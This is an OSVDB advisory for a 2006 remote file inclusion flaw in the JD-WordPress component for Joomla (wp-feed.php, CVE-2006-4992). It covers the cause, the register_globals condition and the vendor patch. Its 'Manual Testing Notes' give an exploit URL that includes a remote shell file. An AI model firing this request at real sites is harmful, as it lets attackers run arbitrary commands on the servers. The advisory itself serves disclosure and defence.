JD-WordPress for Joomla wp-feed.php Remote File Inclusion

2006-07-28T01:13:04
ID OSVDB:28998
Type osvdb
Reporter Drago84()
Modified 2006-07-28T01:13:04

Description

Vulnerability Description

JD-WordPress for Joomla contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to wp-feed.php not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

Short Description

JD-WordPress for Joomla contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to wp-feed.php not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://shell.txt

References:

Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,81064.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Related OSVDB ID: 28999 Related OSVDB ID: 28997 Other Advisory URL: http://www.babilonics.com/?q=node/1802 CVE-2006-4992 Bugtraq ID: 19209